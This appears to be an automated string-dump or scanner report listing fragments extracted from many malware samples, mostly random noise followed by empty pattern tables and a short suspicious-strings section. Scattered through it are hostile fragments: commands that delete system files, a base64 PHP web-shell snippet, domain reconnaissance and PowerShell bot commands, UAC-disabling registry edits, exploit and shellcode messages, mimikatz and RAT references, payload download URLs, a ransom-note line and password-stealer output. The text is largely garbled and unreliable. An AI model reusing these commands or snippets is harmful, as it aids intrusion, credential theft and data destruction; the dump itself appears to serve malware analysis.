Unavailable del weak1.txtdel attack.txtdel /s /q c:\\windows\\system32\\doors\\!&start iexplore http://www.crsky.com/soft/4818.html)uuumuuufuuufuuufuuufuuufuuufuuufuuufuuufuuufuuumuuu_credsusing wce r
Unavailable ),]e+
Unavailable %pdf-
Unavailable stack pointer corruption
Unavailable ie]>xn8
Unavailable "%-4
Unavailable {rz"n
Unavailable (g%17
Unavailable (d$0h
Unavailable escapedll.dllacrord32.execre'atetoo'lhelp
Unavailable x2.00
Unavailable fjhxu
Unavailable ]r8p
Unavailable )l$y
Unavailable mozilla/4.0 (compatible; windows nt 5.1; msie 7.0; trident/4.0; %s.%s)\" target=\"newref\"></a>c
Unavailable dqf9
Unavailable e 53
Unavailable \]{ q
Unavailable khjy
Unavailable u2e:
Unavailable fuf]af
Unavailable /+)r
Unavailable <description>winrar sfx module</description>b
Unavailable d$ p
Unavailable |0eu
Unavailable s,, <zw
Unavailable ! /fa
Unavailable cfcc
Unavailable ~iyj
Unavailable 77a779<c<g<m<r<x<9 9-9n9x9s9postquitmessagepwlfnn10,gzg_winver7cfc52cd3f87.dlls
Unavailable t'ud
Unavailable homepage: www.encryptpe.com
Unavailable aapu
Unavailable hprc
Unavailable copyright (c) 1991 w collis
Unavailable zcx{
Unavailable 7jb&y
Unavailable j_e{-
Unavailable !~~@u2
Unavailable yv12
Unavailable user-agent: %shost: %s:%dcache-control: no-cachecontent-type: application/x-octet-streampragma: no-cache3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff19490631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd:*:::d:\\:c:~:spmuvrcopy /y \"%s\" \"%s\" del /f \"%s\" del /f /ah \"%s\" if exist \"%s\" goto rept \\*.*.lnkdropped$innn[i$[i$^i[e[mdi[m$jf1wehn[^whl[^iin_hf$11mahzijnjbi[^[w[f1n$dej$[hn]1[w1ni1l[ic1j[mzjchl$$^he[[j[a[1_iwc[e[h$ywdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1w1[1cjm1[$[k1zw_$$ncn[[inbnnc[i9enanid[fzcx0123456789abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz!@#$%^&()`~-_=+[{]{;',.e_$0[bw\\rzy\\jb\\zy[nimirc[jrz]f_ridj0w9rfb[$fbc9[k_?wnhwi[$lz![nj_[[lk[8ihlo8ziil[[[$ynk[f_8[88wwwjw[ywnl$$z[ilf!$iz$!w>wl![w!k!$l!wow8$nj8![8n_i^$[>_n[zy[[xhn_c!nnfk[!z[i_^])[$n!]wj^,h[,!wzmk^o$dz[h[e!&w!l[$nd[d&)^z\\^[[iwh][[[jpyo[g$$e&n\\,wfg$[<g$[[ninn:j!!)wk[nj[[o!!ys
Unavailable fhhec
Unavailable =wsfp3
Unavailable vrmi
Unavailable xye@
Unavailable !qgn!
Unavailable %~gn
Unavailable hwtdd
Unavailable t00ls
Unavailable exitprocess3
Unavailable mok~ac
Unavailable yec#
Unavailable i3zt
Unavailable t&h+
Unavailable r&ec
Unavailable 2y8i
Unavailable {#x7
Unavailable psqrvwu
Unavailable !?j"
Unavailable dzhxh
Unavailable |$ e3
Unavailable /es/
Unavailable sssx-,
Unavailable ?+av]`
Unavailable googlecrashreport.dllcrasherrorscrashsendcrashadddatacrashcleanupcrashinit='base'.(str_replace(\"\\n\", ''.substr(md5(strrev(_cookieisset<?php $@assert(base64_decode($_request[(str_replace(\"\\n\", '', '(strrev($de'.'code';(str_replace(\"\\n\",'',;if(php_version<'5'){=substr_replace(
Unavailable hht\c
Unavailable popr
Unavailable [ fv
Unavailable rsfvxd.dattsb386.datfrmmlg.datsmdhost.dllk
Unavailable xp5sw
Unavailable q8wu
Unavailable `vector copy constructor iterator'
Unavailable )>'.1
Unavailable ^|z{
Unavailable q^`i-
Unavailable dlzu
Unavailable {wpce
Unavailable @l01wb
Unavailable =hu(0
Unavailable h9l$ht?h
Unavailable @[spec]
Unavailable guntbypass
Unavailable ;f4r
Unavailable zv6e
Unavailable p5k}%
Unavailable w"^8f
Unavailable o9yp
Unavailable cwkqmzlavvvvvvvvvvvvvcwsdcjkz85m7jvm7jfxkzmzmrdczxasmzmzzbj1ys/o
Unavailable zhya
Unavailable nray
Unavailable \e0w3
Unavailable ?u)#
Unavailable pttoy
Unavailable 3k0g
Unavailable init1\
Unavailable hxmv
Unavailable 45bw=
Unavailable 79cp
Unavailable #okc
Unavailable strf(
Unavailable readdir648
Unavailable wvpqr
Unavailable >0x;6
Unavailable e;m6
Unavailable volrec.pdbv
Unavailable y?zz
Unavailable <_wes
Unavailable acrotray.exec
Unavailable p408
Unavailable drw9}#
Unavailable 2`6+k
Unavailable (k1b;
Unavailable 6#phy
Unavailable vuuu
Unavailable enc.com.b&f=
Unavailable modstartmodstoptoo long data for this type of transportnot enough server resources to complete operationtask not execute. arg file failed.global\\msctf.shared.mutex.zrxpeer has closed the connectiontcpdump.exewindump.exedsniff.exeethereal.exesnoop.exeettercap.exeminiport.datnet_password=%sinternal command not support =((l|-1|as_cur_user:openprocesstoken():%d, %s|l|-1|createprocessasuser():%d, %s|l|-1|as_cur_user:logonuser():%d, %s|l|-1|try to run dll %s with user priv|\\\\.\\global\\pipe\\sdlrpc\\\\%s\\pipe\\comnodeplugin dll stop failed.as_user:logonuser():%dm
Unavailable @uy
Unavailable x=lh)
Unavailable +skv
Unavailable nwvs
Unavailable x9-v5['
Unavailable d8t$ht
Unavailable r9?}3
Unavailable loadli
Unavailable ?qbj
Unavailable >2pml$
Unavailable whoami & hostname & ipconfig /allnet user /domain 2>&1 & net group /domain 2>&1net group \"domain admins\" /domain 2>&1 & (get-content $env:public\\libraries\\dns.ps1) -replace ('#'+'##'),$botid | set-content $env:public\\libraries\\dns.ps1invoke-expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')('00000000'+(convertto-base36(get-random -maximum 46655)))flash.media.sound()call kernel32!virtualalloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40){4d36e972-e325-11ce-bfc1-08002be10318}netstreamzhoupin exploit crewzhopin exploit crewbackdoorloggerzhuaddresspcap_dump_openresolving ips to poison...warnning: gateway ip can not be found%s-%02d%02d%02d%02d%02d.rc:\\users\\%s\\appdata\\cookies\\n
Unavailable 0(24,
Unavailable #kio
Unavailable xi;=
Unavailable ]_^[
Unavailable dgqv
Unavailable [e7]p>u
Unavailable <font size=4 color=red>com 6 is success</font><font size=4 color=red>com 7 is success</font><font size=4 color=red>com isn't success</font><font size=4 color=red>process is exist</font><
Unavailable jpeg
Unavailable txrt
Unavailable cvrit000.bat[
Unavailable upx-shit v0.1 - www.blacklogic.net - code by
Unavailable comparestringw
Unavailable ip2{
Unavailable v&f?
Unavailable fg9$ou
Unavailable d$`h;
Unavailable x3\]7
Unavailable d,3'
Unavailable `l3fm
Unavailable kt\00dc
Unavailable m`x\
Unavailable t$(3
Unavailable a00dcm
Unavailable t+vw
Unavailable microsoft.visualbasic.applicationserviceswloaderwloader.g.resourcesexecuteassemblybynamegettypefromhandlegetmanifestresourcenamesinitializearraygetmanifestresourcestreamadwind.classextra/constantes.classdesinstalador/made.adwind%s%dpara1=%dpara2=%dpara3=%dccommandattribeccommandcdccommandcmdccommandnopc
Unavailable a_a^_^]
Unavailable a>pp&
Unavailable :"gq
Unavailable n\da
Unavailable \>z!
Unavailable sysfreestring
Unavailable oheg
Unavailable p016
Unavailable h1`u
Unavailable <rda
Unavailable xbo'
Unavailable zty1l
Unavailable 3uby`m
Unavailable w6sv
Unavailable z=lri|
Unavailable l$83
Unavailable e0auif
Unavailable _hypot
Unavailable dmcs
Unavailable *mo+g
Unavailable zf215
Unavailable eg00dc%
Unavailable h!au
Unavailable hnh(
Unavailable (r-cs
Unavailable +qdf`
Unavailable qzky
Unavailable zf2g
Unavailable @"*?p
Unavailable g-am
Unavailable .rlp
Unavailable {kmiop
Unavailable @8it
Unavailable awl\:6}]27}w
Unavailable {xfh3
Unavailable t$tf;
Unavailable /ugs
Unavailable ewth9
Unavailable ^]yqyf
Unavailable ca<nrw
Unavailable ' was corrupted.
Unavailable uo8a
Unavailable @x}a
Unavailable (d$0f
Unavailable i4an
Unavailable ;q-&
Unavailable unhandledexceptionfilter
Unavailable ,%n0
Unavailable restrict(
Unavailable hxxxx
Unavailable hh-@
Unavailable ^pa,5y
Unavailable tjd+
Unavailable u3hch<h
Unavailable wy&`
Unavailable hl[c
Unavailable 8@nu
Unavailable fkqqa{
Unavailable 5h1@
Unavailable d$pp
Unavailable 6#6r
Unavailable m?vs
Unavailable d$,d
Unavailable t$ha
Unavailable hxyc
Unavailable *lbd
Unavailable ke6lnh
Unavailable ^1z2
Unavailable u m3
Unavailable _y/5,
Unavailable x^77v
Unavailable ) gj
Unavailable pqrs
Unavailable 001wb
Unavailable 8@tjh
Unavailable >_is
Unavailable expr-v.1.5.
Unavailable @u(p
Unavailable '0yh
Unavailable ki*d
Unavailable `pack$@
Unavailable >2h1
Unavailable /g3b00dc^
Unavailable ac:\\users\\cool\\documents\\visual studio 2010\\projects\\dlltest\\release\\dlltest.pdb\x00up file error\x0d\x0aup file ok\x0d\x0aaallaamoot
Unavailable 23,<
Unavailable civ3[
Unavailable jcn+j
Unavailable 3l9\
Unavailable er-m5
Unavailable iss*
Unavailable |$0s-
Unavailable d$(m
Unavailable a@fd
Unavailable fl;%(
Unavailable #{@wvpf
Unavailable dkik
Unavailable .x>fa
Unavailable ]vz""
Unavailable m}ct
Unavailable f?!2b
Unavailable w-z\
Unavailable d8(t[h
Unavailable ?ev}0
Unavailable gx*}=,
Unavailable bdz#r
Unavailable bwhs
Unavailable "ih:,
Unavailable c03:
Unavailable code-lock.ocx
Unavailable ns-x
Unavailable {n:>
Unavailable lj[;>
Unavailable l=,:+
Unavailable `string'
Unavailable 5^9r
Unavailable exestealth v2 shareware f
Unavailable a9uy7
Unavailable ?/a5z
Unavailable k`h;
Unavailable hcb~
Unavailable d{f7
Unavailable a_a^_
Unavailable 8$uu
Unavailable h!i<`
Unavailable namz+y
Unavailable @jd:x
Unavailable qrrprr
Unavailable vjj.
Unavailable /selfservice/microsites/search.php?%016i64d/solutions/company-size/smb/index.htm?%016i64dm
Unavailable "a0icz
Unavailable upx-shit v0.1 - www.blacklogic.net - code by [500mhz]
Unavailable s4lc?
Unavailable a-vx
Unavailable 0iea
Unavailable x awh
Unavailable 3<w\n
Unavailable exitprocess]
Unavailable ntmcn7$
Unavailable getsystemtimeasfiletime
Unavailable s cxmdg
Unavailable t$lrpv
Unavailable 0`s0o~
Unavailable ":3piqm
Unavailable 5e v
Unavailable d$$h6q
Unavailable fd9|t@
Unavailable 8^z]
Unavailable _u&x
Unavailable k00dc
Unavailable 2tpp
Unavailable d7x5
Unavailable jm?k
Unavailable fb9<hu
Unavailable @kernel32.dll
Unavailable ~g/>~
Unavailable hast
Unavailable regged to gold sample
Unavailable 3)sqy
Unavailable @.gfids
Unavailable c:\\projects\\greaterdoctor\\trunk\\greaterdoctorsrc\\build\\release\\dllconfig\\dllconfig.pdbgreaterdoctor [ commandline args configuration ]-useage: <scanner> \"<cmdline args>\"+daemon_version,system,processor,refid,clockusage: %s typeofscan ip_address# scanning ip %d.%d.%d.%d***** %s ***** (length %d)d$7p
Unavailable w)si
Unavailable gsyw
Unavailable %g0/
Unavailable enablelua /t reg_dword /d 0 /f*a01**a02**a03**a04**a05**a06*hostsettingssevane.tmpcmd_.bata2b7c3d7e4cmd.dlldefpathhknamehportipathpanelpathrooturlvirusscanpronoipstreamwebcamdomain_passwordstub.form1.resourcesf
Unavailable hjve]
Unavailable verr
Unavailable [pcj
Unavailable d$vid$\l
Unavailable modf
Unavailable shregsetusvalueww
Unavailable 1@e~ry
Unavailable <snw
Unavailable kph;
Unavailable stack area around _alloca memory reserved by this function is corrupted
Unavailable ]aki
Unavailable ssfkhttp://xa.xingcloud.com/v4/sof-everything/http://www.mysearch123.com21e223b3f0c97db3c281da1g7zccaefozzjcktmlmay
Unavailable e8a_a^a]a\_^[]
Unavailable h[:b
Unavailable writedroofiledroocmddroohideupdatepzfilehidesysupfilehidesyscmddesnation %s is small than finished!
Unavailable dxy5g
Unavailable a^_^
Unavailable d$49c
Unavailable ,gxl
Unavailable .ylf
Unavailable gl\c^l
Unavailable frfzfpfx
Unavailable 5d]}
Unavailable clg)l=
Unavailable dx&[==#l
Unavailable sm873
Unavailable get domain:%s ip failed.connect to server failed.kernel32.dll^g\\.sus\"bu56load3o mytmp(im) values (marathontool/blind sql injection tool based in heavy queriess
Unavailable <vgl
Unavailable ..h]
Unavailable w (h=
Unavailable pyv-|
Unavailable qj(tr
Unavailable rs#|g
Unavailable btza^
Unavailable )ba=
Unavailable "o\a
Unavailable !9>33
Unavailable recoder : houdini (c) skype : houdini-fx'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=response = post (\"is-ready\",\"\")execute failed!execute success!execute success]sres=%ssmac=x-down(x-downonly(x-exec(x-delay(d:\\p\\win\\release\\win.pdbd:\\p\\win\\release\\s4.pdbcmdshell.secloginedquerytimeripaddress=%d.%d.%d.%d%s%s%02x-%02x-%02x-%02x-%02x-%02xcommand.comosversion=%slogined=%cmainfilename=%s
Unavailable |[qh
Unavailable svw3
Unavailable w9?b
Unavailable t`a+
Unavailable /-gc1
Unavailable debugger or tool for monitoring detected!!!
Unavailable |$(a^
Unavailable d$=s
Unavailable ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
Unavailable dvhd
Unavailable http://%s/%s%u processor:memory (free/total): %d(mb)/ %d(mb) (use %d:\\buildsource\\9\\windowsclient\\windowsclient.client.rc\\binaries\\win32\\release dlphook\\*
Unavailable c01e
Unavailable hq|}
Unavailable 1kkz
Unavailable kuz{
Unavailable zhlookup.propertiesmimikatzrunnerzhmimikatzzh0ush311your target
Unavailable 6n;x
Unavailable gh0st updatesandbox_avg10_vc9_sp1_2011gholeerichha
Unavailable a`th
Unavailable a_a^a\_^][
Unavailable sssx-2
Unavailable ;2ds#i
Unavailable @a_@
Unavailable (p[f
Unavailable |xxip
Unavailable :ftg-
Unavailable d$`u
Unavailable ]%azc
Unavailable 5^kb
Unavailable 9a88
Unavailable psddv
Unavailable <u]k%o
Unavailable flsgetvalue
Unavailable iut8
Unavailable safearrayptrofindex
Unavailable n]>c\o@
Unavailable getlocaleinfoex
Unavailable dllh
Unavailable h7q8
Unavailable o=(*
Unavailable h`#@
Unavailable >mz8
Unavailable d$4wh@gd
Unavailable d$@h
Unavailable ynz8
Unavailable 7du^
Unavailable ;bko<
Unavailable rz5k
Unavailable msdnet32.dll_ntdsllrc@4_ntdsllrv@8_ntdsllspcty@12_xdslconnect@8_ntdsllspc@8_ntdsllsp@20_safemodent@12_ntdr@0crf32lib.dllcrflib.dllclsids2/creationdate (d:20111114160831)shellsrv32.dllmsdnet.dllshellsrv.dllaltsrv.exealtnet.exealtnet32.exeheg235_add.php{118-32-foobox-15}{118-32-fooboll-15}{132-79-footboll-18}{119-36-footboll-92}_pauseprintspool%error set lint into file failed. %dnadzorlog.txt_secondprintspool
Unavailable expr-v.1.4.
Unavailable n7od
Unavailable i!3,
Unavailable infoharvestercmd.dllhavex1312312f
Unavailable ;b?[
Unavailable ^q]px@,$3e
Unavailable td-y
Unavailable &szu4
Unavailable )!nb
Unavailable [rf!
Unavailable u"hcmhh
Unavailable x,ih
Unavailable el=h-
Unavailable hk@]1
Unavailable tge3
Unavailable n;1y
Unavailable v:])
Unavailable ;i|+`
Unavailable "sj/
Unavailable 'r$z_
Unavailable |$(l
Unavailable aazl
Unavailable v#su
Unavailable &0z}
Unavailable tsf91tnh
Unavailable qbcm
Unavailable raiseexception
Unavailable x~h9
Unavailable ^qyp
Unavailable \.qr
Unavailable l$dh
Unavailable 2~3tm;
Unavailable abcdefghijklmnopqrstuvwxyz
Unavailable sefsrfdbukvcrevtq1jjufrjt05cu3lzdgvtxenlbnryywxqcm9jzxnzb3jcma==gqrgfrpva
Unavailable t_quit_got_dir
Unavailable \8_e
Unavailable wavawh
Unavailable wj4 4g
Unavailable $+cj
Unavailable 3>n;ku
Unavailable halpp
Unavailable j97b
Unavailable tqh9
Unavailable l8x,z,
Unavailable sys\\tdip.dbgdip.systdip.pdbm
Unavailable x av3
Unavailable v#sf
Unavailable 0ep\
Unavailable \$ h;
Unavailable 5^f%
Unavailable $tmes
Unavailable 6b}z
Unavailable {i"b
Unavailable fke,dfd
Unavailable fd$wo
Unavailable {:p^
Unavailable i,fx
Unavailable mcf892108549c:\\temp\\ljjjklllllllllllllllllll324234444444444444444444444444fwedssssssslllllllllllljiooooooooooooooooooooooooooooohjknnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn78ghuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuijjjjx.pdb<description>d3scription</description><strong>this page is big find</strong>onthread_pipeserver6b4e2f40b138c4921f1584ca0efc19ea6b4e2f6b4e2f40%
Unavailable kf%q5
Unavailable microsoft enhanced cryptographic provider v1.0\\system32\\svchost.exe:repeat\x0d\x0adel %s\x0d\x0aif exist %s goto :repeat\x0d\x0adel %%0.php?compname=/path_active.php?compname=/fetch_updates_pops.php?compname=/is_array_own.php?compname=/checkpkg.php?compname=/versionchk.php?srs=/vtris.php?srs=/vtris1.php?srs=/fetch_updates_step.php?compname=/c wmic diskdrive list brief > /petal_active.php?compname=percf001.dat_percf001.datcurl_easy_performhttp://199.91.173.45/percf002.dathttp://199.91.173.45/update_dll.dllhttp://199.91.173.45/libcurld.dll!microsoft!winusb.exec:\\intel\\logs\\file.pdbc:\\users\\tranchulas\\documents\\visual studio 2008\\projects\\upload\\release\\upload.pdbc:\\users\\cert-india\\documents\\visual studio 2008\\projects\\ufile\\release\\ufile.pdbdoworku
Unavailable p44p
Unavailable cm[+] backdoor shellcode written[*] attempting exploit method %derror: could not calloc() for shellcode buffershellcodesize: 0x%04x + 0x%04x + 0x%04x = 0x%04xgenerating shellcode([0-9a-za-z]+) ok logout completederror: domino is not the expected version. (%s, %s)[-] error: exploit choice not supported for target os!!error: target machine out of npp memory (very bad!!) - backdoor removed[-] error: backdoor not present on target*********** target architecture is x64 ************[+] \"targetport\" %hu---<<< complete >>>---[+] \"networktimeout\" %huf
Unavailable yyn]z
Unavailable 6}mzm<_
Unavailable \;n_"
Unavailable t$4f;
Unavailable k(.q
Unavailable \\*\\3vpnu
Unavailable zxnw
Unavailable roinitialize
Unavailable yr}
Unavailable 9)gv
Unavailable rle9
Unavailable %q*0
Unavailable 1;@h
Unavailable 00dcn
Unavailable ~sm;b
Unavailable e#q"1fq'
Unavailable ydj/
Unavailable 0hxj
Unavailable wnij
Unavailable d0ooa
Unavailable @zxw
Unavailable zi]x
Unavailable t$hh
Unavailable >ncruc2
Unavailable ,sv3
Unavailable /z?&q
Unavailable .fz_@
Unavailable |[4je*
Unavailable \4^w
Unavailable getprocaddressya
Unavailable mapviewoffile
Unavailable r7;f
Unavailable qf.r
Unavailable {|4$
Unavailable usvqrw
Unavailable $et+
Unavailable l9l$p
Unavailable ex'16
Unavailable mb*4
Unavailable vlkws
Unavailable b c0
Unavailable hhb@@"
Unavailable vids
Unavailable pejk
Unavailable wuwvrqs
Unavailable _,c>x
Unavailable upi91tk
Unavailable won't be able to recover your files anymore.</p>j
Unavailable i)vj
Unavailable "b-)
Unavailable
Unavailable {b7
Unavailable ?defo?d
Unavailable %ny<
Unavailable 7]+[
Unavailable .pdata
Unavailable y411
Unavailable {kwq
Unavailable 2rr#6v
Unavailable wqw+xh
Unavailable r^\ai\op=r
Unavailable _fvv
Unavailable t;q[.9?x
Unavailable myu=
Unavailable $>)+m
Unavailable f;\$ts
Unavailable d8l$ht
Unavailable =/,<
Unavailable })&(
Unavailable cli::array<
Unavailable nspack$@
Unavailable @ch;
Unavailable silent team app protector
Unavailable kex?
Unavailable v8xy
Unavailable kvinterlockedcompareexchange
Unavailable pla<
Unavailable heaprealloc
Unavailable f,hz
Unavailable d$0p
Unavailable i96t:h
Unavailable 5r3e
Unavailable kernel32.dll
Unavailable . 8h'
Unavailable &=q~_
Unavailable w!n7
Unavailable 6-s<
Unavailable d$no
Unavailable session folder with name '%s' already exists.show unconnected endpoints (ctrl+u)c
Unavailable [wxp[
Unavailable crc3`
Unavailable c:\\program files\\devstudio\\vb\\vb5.olbm
Unavailable @uhw
Unavailable !d$h
Unavailable /tmp/tmpaddressbook.vcf
Unavailable psqr
Unavailable debug: cannot allocate memory for ptrfilearray!%
Unavailable )t$@e
Unavailable qrs3
Unavailable fc94wu
Unavailable v10:
Unavailable ]nu1
Unavailable ppycu 2f
Unavailable 13&y
Unavailable loadlibraryaexpr-v.1.3.u
Unavailable 1cb+%
Unavailable a[wz
Unavailable @z0oz_
Unavailable rxt;
Unavailable ;p>a
Unavailable (f<a
Unavailable 5m!_:sq
Unavailable cpla
Unavailable `default constructor closure'
Unavailable #wzx
Unavailable p)s%
Unavailable uf!t$(h!t$
Unavailable \\ws2check.exe\\trojans.lst1
Unavailable mwwd
Unavailable ]u-w]
Unavailable p01wb
Unavailable pek{
Unavailable 089paradoxratstartrmcamfloodersslowlarisshitemidset_remote_chatm
Unavailable d$8h
Unavailable *3se
Unavailable zhhr
Unavailable software\\kasperskylab\\protected\\avp12\\environmentsoftware\\kasperskylab\\protected\\avp9\\settings%systemroot%\\system32\\winlogon.execom.apple.pubsabagent/tmp/screen.jpeg
Unavailable 2pst
Unavailable ep|&.
Unavailable nqw.
Unavailable wbruteerror.txtgood.txtsource.txtbad.txtgenerator ip@login;passwordset /p \"=4d5apowershell -command \"$hex=set+%2fp+%22%3d4d5powershell+-command+%22%24hexecho 4d 5a echo r cx >>echo+4d+5a+echo+r+cx+%3e%3e%
Unavailable d|0i
Unavailable qy'r
Unavailable outputdebugstringw
Unavailable ss"e
Unavailable m=%h
Unavailable c|w{
Unavailable rnd!
Unavailable getcurrentthread
Unavailable m&(j
Unavailable d$ i
Unavailable xk#d
Unavailable [=1"\
Unavailable $#ftk
Unavailable @8l$ht
Unavailable c:\\users\\cmd\\desktop\\msacm32\\release\\msacm32.pdbp
Unavailable ^ku7fs
Unavailable mec&
Unavailable 4#.#n
Unavailable 'tczc]
Unavailable ~%m*kf
Unavailable tda+
Unavailable 6bu!
Unavailable z3;,
Unavailable `rtti
Unavailable jn*x
Unavailable lg8q
Unavailable )ka
Unavailable # cq
Unavailable :j|up/
Unavailable "c\
Unavailable #$+3
Unavailable @sm00dc
Unavailable d$tj
Unavailable 6p}<dk
Unavailable "}40
Unavailable +,+d
Unavailable ?.ram
Unavailable 9%c@d
Unavailable }t8y
Unavailable eyau
Unavailable 6v@d
Unavailable 79kdj
Unavailable sqh$
Unavailable (=*>
Unavailable ?lsd
Unavailable yhee
Unavailable ---hidehide---port = %dimagename found at:%sj
Unavailable m0(00dc
Unavailable o1iz)
Unavailable j<ck
Unavailable zd0]
Unavailable m?vf
Unavailable lppe == nullrunexecmd.dllm
Unavailable pass->logon successful250 requested file action okay, completed.m
Unavailable :<=wv
Unavailable .3ds
Unavailable }yc/g4
Unavailable n&5iwm)
Unavailable ------- www: http://zalexf.narod.ru/ -------
Unavailable l01wb
Unavailable +o=m.
Unavailable q].qa)bs
Unavailable uge}
Unavailable jw5&
Unavailable ggy*
Unavailable d$ut
Unavailable _^[]
Unavailable w\wt
Unavailable p)!p
Unavailable vh-r
Unavailable failed crc check
Unavailable http://hkmujj.co.cc--------
Unavailable _^zy[]
Unavailable l4'q
Unavailable ?m+0
Unavailable d$@+
Unavailable `d0qc
Unavailable =a]fql,u
Unavailable temeg
Unavailable 0ht4
Unavailable 8w;9
Unavailable s30al
Unavailable )bh#i
Unavailable gsd1
Unavailable @<a;
Unavailable z`$jf
Unavailable connect_back_tcp_channel#do_connect:: error resolving connect back hostnamekernel32.dll getprocaddressloadlibraryaws2_32.dllc
Unavailable pew6a
Unavailable (]ddedata initialized (ansi), app strings are '%s' and '%s'
Unavailable 1.23
Unavailable h\w}!
Unavailable _l0k
Unavailable lj@?om'
Unavailable l$hh
Unavailable >sp=
Unavailable owm&
Unavailable q<v+`
Unavailable nbzv
Unavailable d$(a
Unavailable =c;~<
Unavailable f{hu
Unavailable i<^v
Unavailable jh01wb
Unavailable winhelpwreadprocessmemorywshshell.run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, falsewshshell.currentdirectory = \"c:\\windows\\temp\\dropbear\\\"set wshshell = createobject(\"wscript.shell\")dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.htmlbadly formatted command= authorized_keys optionthis dropbear program does not support '%s' %s algorithm/etc/dropbear/dropbear_dss_host_key/etc/dropbear/dropbear_rsa_host_keypassds5bu9te7s
Unavailable 8$us
Unavailable yli0
Unavailable 2-ipi
Unavailable -8s
Unavailable r}wf
Unavailable g}im+%
Unavailable cryptunprotectdatac
Unavailable 0v;yq
Unavailable t$`d
Unavailable dd.$
Unavailable h`sc
Unavailable _x7=
Unavailable t$(a
Unavailable cfffrx,`,`2$f=hx
Unavailable n)tm
Unavailable 8?f!i'b
Unavailable kx+g
Unavailable ki#v
Unavailable friday
Unavailable getenabledxstatefeatures
Unavailable }=->2
Unavailable cv:
Unavailable )>6{1n
Unavailable d$@a
Unavailable ^o_k
Unavailable h&f;
Unavailable 8mz-
Unavailable vwwh
Unavailable k9d9n
Unavailable |seex
Unavailable |1b;nh%g
Unavailable %s-sn%d-%s%
Unavailable +-rni
Unavailable server.dllc
Unavailable &`0%'
Unavailable $qe}
Unavailable pe1wxcfvybho5c
Unavailable 'eec
Unavailable a}xzv&3
Unavailable usqwvr
Unavailable 1by>
Unavailable c:\0000001.dat
Unavailable esikv
Unavailable zw[~
Unavailable unl+
Unavailable f~+e
Unavailable hvf;
Unavailable hxf}"
Unavailable y`)[
Unavailable bu9q
Unavailable sit!
Unavailable |$@l
Unavailable !not enough memory$
Unavailable c#ns
Unavailable enterprise mailing serviceblacklisted by rule: %s:%s/successmails?campaignnum=%ld/timedoutmails?campaignnum=%ld/invalidmails?campaignnum=%ldfailed to download maillist, retryingno maillist loadedsuccessfully sent using smtp account %s (%d of %ld messages to %s)successfully sent %d of %ld messages to %ssending to %s in the same connectionnew connection required, will send to %smail transaction for %s is over.domain %s is bad (found in cache)domain %s found in cachedomain %s isn't found in cache, resolving itall tries to resolve %s failed.failed to receive response for %s from dns servergot dns server response: domain %s is badgot error %d in response for %s from dns servermx's ip for domain %s found in cache:timeout waiting for domain %s to be resolvedno valid mxes for domain %s. marking it as badresolving mx %s using existing connection to dns serverall tries to resolve mx for %s are failedresolving mx %s using dns serverfailed to receive response for mx %s from dns servert
Unavailable 5v4>
Unavailable ,d_z
Unavailable 50b@
Unavailable cookie: pgv_pvid=%016i64d{e190bc79-02dc-0166-4cf1-bd8f8cb2ff21}index.htm?%016i64dakasha_path: %scycle: %d, sleep time: %dinstalldriver: %d %s(%s)succeed to drop, please wait for the next payload being loaded.!module mimi!axel url path{
Unavailable efeb0a9c6aba4cf5958f41db6a31929776c643dedc65cc9b67ab8b0066ff2492\\device\\ndisraw_\
Unavailable tt(i
Unavailable .?avdnamestatusnode@@
Unavailable qx/=
Unavailable dm}2
Unavailable t$(e3
Unavailable m!ldt
Unavailable y:?d
Unavailable w;oz-+{
Unavailable <)fzh_^d
Unavailable )t$2
Unavailable mw|8
Unavailable rpx8
Unavailable ( \rdg
Unavailable q~cgl
Unavailable msd users versionj
Unavailable 8?u$h
Unavailable 8$u*e
Unavailable _a$,
Unavailable fd9<xu
Unavailable ~zk[r8
Unavailable svpd
Unavailable iqhl
Unavailable (jw^
Unavailable 6"m-h
Unavailable qv0[
Unavailable pfvr
Unavailable ingl
Unavailable rzkc^r
Unavailable 6+]{
Unavailable ,tdz{
Unavailable i7+,
Unavailable s",v_a
Unavailable ys@_o
Unavailable k%?=
Unavailable tlssetvalue
Unavailable xph;
Unavailable vx\s
Unavailable 00dc6
Unavailable |$(i
Unavailable `placement delete[] closure'
Unavailable 08{n
Unavailable %s\\%s%d.%sh

PATTERNS:IP4S

Count IP Code Alpha2 Description

PATTERNS:LINKS

Count Link Description

PATTERNS:EMAILS

Count EMAIL Description

PATTERNS:TAGS

Count TAG Description

PATTERNS:HEX

Count HEX Parsed

SUSPICIOUS:STRINGS

Count Detected
1 cryptprotect_promptstructdiscomousegetdeepinfoaes_encryptstartudpfloodb
1 ati.jo840112-cras8468-11150923-pci8273vprincpespr!ncpeshastati\\temp\\~v3.logbrowser password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
